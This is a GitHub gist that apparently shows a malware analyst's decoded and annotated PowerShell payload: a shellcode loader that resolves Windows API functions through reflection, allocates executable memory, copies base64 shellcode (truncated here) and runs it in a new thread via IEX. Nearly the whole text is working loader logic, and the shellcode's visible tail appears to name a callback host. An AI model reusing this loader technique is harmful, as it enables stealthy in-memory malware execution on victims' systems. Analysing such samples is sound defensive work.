Last active
August 7, 2020 06:33
-
-
Save jdferrell3/5fd43253fe5588f8d7392d7ef103f19e to your computer and use it in GitHub Desktop.
powershell payload decoded
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Formatting tweaked for readablity as an embedded gist, will not execute | |
# commented as well | |
Set-StrictMode -Version 2 | |
$DoIt = @' | |
function func_get_proc_address { | |
Param ($var_module, $var_procedure) | |
$var_unsafe_native_methods = ( | |
[AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { | |
$_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') | |
}).GetType('Microsoft.Win32.UnsafeNativeMethods') | |
return $var_unsafe_native_methods.GetMethod('GetProcAddress').Invoke( | |
$null, | |
@([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef( | |
(New-Object IntPtr), | |
($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure)) | |
} | |
function func_get_delegate_type { | |
Param ( | |
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters, | |
[Parameter(Position = 1)] [Type] $var_return_type = [Void] | |
) | |
$var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly( | |
(New-Object System.Reflection.AssemblyName('ReflectedDelegate')), | |
[System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) | |
$var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed') | |
$var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed') | |
return $var_type_builder.CreateType() | |
} | |
# base64 encoded shellcode | |
[Byte[]]$var_code = [System.Convert]::FromBase64String("/OiJAAAAYInlMdJki1Iwi1[**********SNIP**********]9hZHMubG9ja3NlY3VyZXMuY29tAA==") | |
# allocate a buffer and copy the shellcode into the buffer | |
$var_buffer = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer( | |
(func_get_proc_address kernel32.dll VirtualAlloc), | |
(func_get_delegate_type @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr]))).Invoke( | |
[IntPtr]::Zero, $var_code.Length,0x3000, 0x40) | |
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $var_buffer, $var_code.length) | |
# HANDLE CreateThread( | |
# LPSECURITY_ATTRIBUTES lpThreadAttributes, | |
# SIZE_T dwStackSize, | |
# LPTHREAD_START_ROUTINE lpStartAddress, | |
# __drv_aliasesMem LPVOID lpParameter, | |
# DWORD dwCreationFlags, | |
# LPDWORD lpThreadId); | |
# create a thread, the lpStartAddress is the buffer containing the shellcode ($var_buffer) | |
$var_hthread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer( | |
(func_get_proc_address kernel32.dll CreateThread), | |
(func_get_delegate_type @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke( | |
[IntPtr]::Zero,0,$var_buffer,[IntPtr]::Zero,0,[IntPtr]::Zero) | |
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((func_get_proc_address kernel32.dll WaitForSingleObject), (func_get_delegate_type @([IntPtr], [Int32]))).Invoke($var_hthread,0xffffffff) | Out-Null | |
'@ | |
If ([IntPtr]::size -eq 8) { | |
start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job | |
} | |
else { | |
IEX $DoIt | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment